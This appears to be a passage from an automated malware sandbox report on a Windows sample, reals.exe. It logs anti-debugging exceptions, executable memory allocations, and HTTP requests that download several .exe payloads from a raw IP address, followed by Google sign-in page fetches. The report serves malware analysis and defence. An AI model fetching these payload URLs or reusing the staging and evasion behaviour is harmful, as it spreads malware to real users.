__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 68 ae 93 c2 1b e9 8e 00 00 00 b8 c0 4d bb 6f exception.symbol: reals+0x2df8a7 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3012775 exception.address: 0xe2f8a7 registers.esp: 2095144 registers.edi: 1114345 registers.eax: 26627 registers.ebp: 4003242004 registers.edx: 14875299 registers.ebx: 378794641 registers.esi: 0 registers.ecx: 14288	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 81 ec 04 00 00 00 89 2c exception.symbol: reals+0x2e5c33 exception.instruction: in eax, dx exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3038259 exception.address: 0xe35c33 registers.esp: 2095136 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 4003242004 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 14879463 registers.ecx: 20	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: reals+0x2e36bc exception.address: 0xe336bc exception.module: reals.exe exception.exception_code: 0xc000001d exception.offset: 3028668 registers.esp: 2095136 registers.edi: 1114345 registers.eax: 1 registers.ebp: 4003242004 registers.edx: 22104 registers.ebx: 0 registers.esi: 14879463 registers.ecx: 20	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 40 2a 2d 12 01 exception.symbol: reals+0x2e19e0 exception.instruction: in eax, dx exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3021280 exception.address: 0xe319e0 registers.esp: 2095136 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 4003242004 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 14879463 registers.ecx: 10	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 68 b2 05 ae 59 e9 7e 00 00 00 c1 ef 07 c1 ef exception.symbol: reals+0x2e9f94 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3055508 exception.address: 0xe39f94 registers.esp: 2095144 registers.edi: 1114345 registers.eax: 14918051 registers.ebp: 4003242004 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 310710112 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 6a 00 52 e8 03 00 00 00 20 5a c3 5a exception.symbol: reals+0x2ea3bf exception.instruction: int 1 exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 3056575 exception.address: 0xe3a3bf registers.esp: 2095104 registers.edi: 0 registers.eax: 2095104 registers.ebp: 4003242004 registers.edx: 1082456532 registers.ebx: 14918992 registers.esi: 12650 registers.ecx: 381767010	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 55 e9 f7 f4 ff ff e9 01 04 00 00 00 00 00 00 exception.symbol: reals+0x2f8bf7 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3116023 exception.address: 0xe48bf7 registers.esp: 2095144 registers.edi: 15001218 registers.eax: 262633 registers.ebp: 4003242004 registers.edx: 6 registers.ebx: 9660924 registers.esi: 1968968720 registers.ecx: 4294944120	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 68 85 a7 0f 55 89 2c 24 50 b8 cd 9c b6 3f bd exception.symbol: reals+0x2fb209 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3125769 exception.address: 0xe4b209 registers.esp: 2095132 registers.edi: 15001218 registers.eax: 14987514 registers.ebp: 4003242004 registers.edx: 6 registers.ebx: 599130341 registers.esi: 1968968720 registers.ecx: 746952217	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 68 5d ef 98 58 89 14 24 ba 7d b1 20 39 c1 e2 exception.symbol: reals+0x2fb4e4 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3126500 exception.address: 0xe4b4e4 registers.esp: 2095136 registers.edi: 0 registers.eax: 14990486 registers.ebp: 4003242004 registers.edx: 306153 registers.ebx: 599130341 registers.esi: 1968968720 registers.ecx: 746952217	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 51 b9 03 f8 93 2a e9 34 f7 ff ff 81 f5 2e 8f exception.symbol: reals+0x2fda6a exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3136106 exception.address: 0xe4da6a registers.esp: 2095132 registers.edi: 0 registers.eax: 26273 registers.ebp: 4003242004 registers.edx: 1718429434 registers.ebx: 1772362797 registers.esi: 14995580 registers.ecx: 1718429434	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 55 e9 37 00 00 00 81 f3 6a b1 c3 85 31 d8 ff exception.symbol: reals+0x2fda13 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3136019 exception.address: 0xe4da13 registers.esp: 2095136 registers.edi: 0 registers.eax: 26273 registers.ebp: 4003242004 registers.edx: 1718429434 registers.ebx: 1772362797 registers.esi: 15021853 registers.ecx: 1718429434	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 52 89 04 24 c7 04 24 c1 89 dd 06 89 14 24 83 exception.symbol: reals+0x2fd3cd exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3134413 exception.address: 0xe4d3cd registers.esp: 2095136 registers.edi: 0 registers.eax: 26273 registers.ebp: 4003242004 registers.edx: 1718429434 registers.ebx: 1179202795 registers.esi: 14998277 registers.ecx: 1718429434	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb e9 b2 fd ff ff 57 81 ec 04 00 00 00 89 34 24 exception.symbol: reals+0x303472 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3159154 exception.address: 0xe53472 registers.esp: 2095132 registers.edi: 0 registers.eax: 28828 registers.ebp: 4003242004 registers.edx: 2130566132 registers.ebx: 15019331 registers.esi: 14998277 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 68 3a 01 61 54 89 exception.symbol: reals+0x3032dc exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3158748 exception.address: 0xe532dc registers.esp: 2095136 registers.edi: 84201 registers.eax: 28828 registers.ebp: 4003242004 registers.edx: 0 registers.ebx: 15022107 registers.esi: 14998277 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb e9 ee 00 00 00 81 c7 1f 72 fe 77 29 f7 51 b9 exception.symbol: reals+0x321872 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3283058 exception.address: 0xe71872 registers.esp: 2095100 registers.edi: 0 registers.eax: 25584 registers.ebp: 4003242004 registers.edx: 2130566132 registers.ebx: 535396836 registers.esi: 15143399 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 e9 ed 00 00 00 bd f9 80 f4 fe 29 c5 exception.symbol: reals+0x321412 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3281938 exception.address: 0xe71412 registers.esp: 2095104 registers.edi: 0 registers.eax: 25584 registers.ebp: 4003242004 registers.edx: 2130566132 registers.ebx: 535396836 registers.esi: 15168983 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 51 89 3c 24 e9 c4 01 00 00 83 c4 04 87 0c 24 exception.symbol: reals+0x321a1f exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3283487 exception.address: 0xe71a1f registers.esp: 2095104 registers.edi: 92475232 registers.eax: 25584 registers.ebp: 4003242004 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 15146275 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb e9 06 00 00 00 55 e9 f9 02 00 00 57 54 5f 81 exception.symbol: reals+0x32252c exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3286316 exception.address: 0xe7252c registers.esp: 2095104 registers.edi: 15146882 registers.eax: 29570 registers.ebp: 4003242004 registers.edx: 1970012160 registers.ebx: 0 registers.esi: 15146306 registers.ecx: 15176861	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb e9 13 fe ff ff 05 2e 0a c3 6c 89 c2 58 50 b8 exception.symbol: reals+0x3225bd exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3286461 exception.address: 0xe725bd registers.esp: 2095104 registers.edi: 1358981728 registers.eax: 29570 registers.ebp: 4003242004 registers.edx: 0 registers.ebx: 0 registers.esi: 15146306 registers.ecx: 15149973	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 43 63 d3 6b 89 3c 24 e9 99 00 00 exception.symbol: reals+0x323ab8 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3291832 exception.address: 0xe73ab8 registers.esp: 2095100 registers.edi: 1358981728 registers.eax: 28721 registers.ebp: 4003242004 registers.edx: 15152171 registers.ebx: 616167254 registers.esi: 15146306 registers.ecx: 15149973	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 56 54 5e 81 c6 04 00 00 00 e9 ac 00 00 00 83 exception.symbol: reals+0x323a64 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3291748 exception.address: 0xe73a64 registers.esp: 2095104 registers.edi: 1358981728 registers.eax: 28721 registers.ebp: 4003242004 registers.edx: 15180892 registers.ebx: 616167254 registers.esi: 15146306 registers.ecx: 15149973	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 56 e9 ae fd ff ff 68 6f 48 20 7d e9 00 00 00 exception.symbol: reals+0x323983 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3291523 exception.address: 0xe73983 registers.esp: 2095104 registers.edi: 0 registers.eax: 28721 registers.ebp: 4003242004 registers.edx: 15154860 registers.ebx: 1461115240 registers.esi: 15146306 registers.ecx: 15149973	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 55 57 bf 37 44 ff 67 89 fd e9 e7 f6 ff ff 01 exception.symbol: reals+0x324966 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3295590 exception.address: 0xe74966 registers.esp: 2095100 registers.edi: 0 registers.eax: 29700 registers.ebp: 4003242004 registers.edx: 15154860 registers.ebx: 899212109 registers.esi: 15155283 registers.ecx: 1279598575	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb e9 0d 00 00 00 56 be 04 00 00 00 29 f3 e9 c7 exception.symbol: reals+0x324688 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3294856 exception.address: 0xe74688 registers.esp: 2095104 registers.edi: 0 registers.eax: 29700 registers.ebp: 4003242004 registers.edx: 15154860 registers.ebx: 899212109 registers.esi: 15184983 registers.ecx: 1279598575	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 3c 24 bf 0f 0a fe 7f 4f exception.symbol: reals+0x324c32 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3296306 exception.address: 0xe74c32 registers.esp: 2095104 registers.edi: 0 registers.eax: 29700 registers.ebp: 4003242004 registers.edx: 0 registers.ebx: 899212109 registers.esi: 15158359 registers.ecx: 322689	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 68 02 f4 82 2d 89 34 24 be 67 ca 5e 7b f7 d6 exception.symbol: reals+0x328ee5 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3313381 exception.address: 0xe78ee5 registers.esp: 2095100 registers.edi: 0 registers.eax: 31563 registers.ebp: 4003242004 registers.edx: 15172490 registers.ebx: 15173392 registers.esi: 15158359 registers.ecx: 1971716238	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 52 54 5a 81 c2 04 00 00 00 e9 d3 f8 ff ff 55 exception.symbol: reals+0x32912a exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3313962 exception.address: 0xe7912a registers.esp: 2095104 registers.edi: 0 registers.eax: 31563 registers.ebp: 4003242004 registers.edx: 15172490 registers.ebx: 15204955 registers.esi: 15158359 registers.ecx: 1971716238	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 51 e9 aa 01 00 00 81 f5 47 76 81 62 81 c6 01 exception.symbol: reals+0x328da1 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3313057 exception.address: 0xe78da1 registers.esp: 2095104 registers.edi: 0 registers.eax: 4294938844 registers.ebp: 4003242004 registers.edx: 15172490 registers.ebx: 15204955 registers.esi: 15158359 registers.ecx: 24811	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 52 c7 04 24 14 79 85 05 e9 9e fe ff ff 81 f1 exception.symbol: reals+0x32b226 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3322406 exception.address: 0xe7b226 registers.esp: 2095104 registers.edi: 15210225 registers.eax: 26539 registers.ebp: 4003242004 registers.edx: 1411511458 registers.ebx: 15204955 registers.esi: 15158359 registers.ecx: 736901359	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 56 68 49 4b 7f 6f 5e 81 ee 01 00 00 00 81 ce exception.symbol: reals+0x32b25b exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3322459 exception.address: 0xe7b25b registers.esp: 2095104 registers.edi: 15186637 registers.eax: 89321 registers.ebp: 4003242004 registers.edx: 1411511458 registers.ebx: 15204955 registers.esi: 0 registers.ecx: 736901359	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 55 57 52 ba 00 17 ff 23 89 d7 e9 c9 07 00 00 exception.symbol: reals+0x32c1e7 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3326439 exception.address: 0xe7c1e7 registers.esp: 2095104 registers.edi: 15186637 registers.eax: 27250 registers.ebp: 4003242004 registers.edx: 3939837675 registers.ebx: 15214634 registers.esi: 0 registers.ecx: 4294943684	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 50 51 c7 04 24 9d 1f a7 7d e9 09 fe ff ff 89 exception.symbol: reals+0x32e420 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3335200 exception.address: 0xe7e420 registers.esp: 2095104 registers.edi: 15225530 registers.eax: 4294939304 registers.ebp: 4003242004 registers.edx: 15192284 registers.ebx: 699251816 registers.esi: 53340 registers.ecx: 151	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 68 bc 33 0f 53 89 3c 24 89 14 24 57 c7 04 24 exception.symbol: reals+0x33a1b6 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3383734 exception.address: 0xe8a1b6 registers.esp: 2095100 registers.edi: 6619658 registers.eax: 32908 registers.ebp: 4003242004 registers.edx: 4294934982 registers.ebx: 15229470 registers.esi: 15245473 registers.ecx: 2733539782	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 57 68 f0 e7 7d 1e 8b 3c 24 57 54 5f 52 ba 04 exception.symbol: reals+0x33ac70 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3386480 exception.address: 0xe8ac70 registers.esp: 2095104 registers.edi: 6619658 registers.eax: 607947088 registers.ebp: 4003242004 registers.edx: 4294934982 registers.ebx: 4294937804 registers.esi: 15278381 registers.ecx: 2733539782	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 50 b8 fc db c3 67 c1 e0 08 57 e9 7d fd ff ff exception.symbol: reals+0x343d7f exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3423615 exception.address: 0xe93d7f registers.esp: 2095100 registers.edi: 15250417 registers.eax: 31980 registers.ebp: 4003242004 registers.edx: 15283151 registers.ebx: 15250385 registers.esi: 15250381 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 6f 5d f8 65 89 3c 24 55 c7 04 24 exception.symbol: reals+0x3436b3 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3421875 exception.address: 0xe936b3 registers.esp: 2095104 registers.edi: 15250417 registers.eax: 31980 registers.ebp: 4003242004 registers.edx: 15315131 registers.ebx: 805229160 registers.esi: 4294938084 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 51 e9 0e fa ff ff b9 f1 30 f7 5d e9 54 03 00 exception.symbol: reals+0x3516b0 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3479216 exception.address: 0xea16b0 registers.esp: 2095100 registers.edi: 15329146 registers.eax: 30864 registers.ebp: 4003242004 registers.edx: 15339656 registers.ebx: 1971716070 registers.esi: 4294938084 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 50 c7 04 24 59 12 fb 2b f7 14 24 57 53 bb aa exception.symbol: reals+0x351cd1 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3480785 exception.address: 0xea1cd1 registers.esp: 2095104 registers.edi: 15329146 registers.eax: 0 registers.ebp: 4003242004 registers.edx: 15342876 registers.ebx: 1971716070 registers.esi: 4294938084 registers.ecx: 1131974760	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb e9 76 fe ff ff 50 b8 c6 04 57 7e c1 e0 02 40 exception.symbol: reals+0x358e58 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3509848 exception.address: 0xea8e58 registers.esp: 2095104 registers.edi: 15329146 registers.eax: 27817 registers.ebp: 4003242004 registers.edx: 2130566132 registers.ebx: 4245485975 registers.esi: 15398053 registers.ecx: 2061893632	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/well.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/well.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/ladas.exe

Performs some HTTP requests (21 events)

request	HEAD http://185.215.113.46/cost/fu.exe
request	GET http://185.215.113.46/cost/fu.exe
request	HEAD http://185.215.113.46/cost/niks.exe
request	GET http://185.215.113.46/cost/niks.exe
request	HEAD http://185.215.113.46/mine/plaza.exe
request	GET http://185.215.113.46/mine/plaza.exe
request	HEAD http://185.215.113.46/cost/well.exe
request	GET http://185.215.113.46/cost/well.exe
request	HEAD http://185.215.113.46/cost/ladas.exe
request	GET http://185.215.113.46/cost/ladas.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ATuJsjz8hj_CR46po7PiB42ipwYGfqMrtT5nDPo2WATpMjLqM1T1R14QgKtFGuAZr7MmlhZEQcq9FA
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ATuJsjz8fZ9bi1BK9xyTyEWNdGu5FL4_x2U6a4Ofo7oIzsGdgebcEPfFwMKRRt2G_zo0xDX63TqJLg&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1492504774%3A1708383126361538
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/_/bscframe
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?eh0r0Q
request	GET https://www.google.com/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1500 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 585728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b51000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02540000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02da0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02dc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02dd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 20, 2024, 7:51 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02de0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
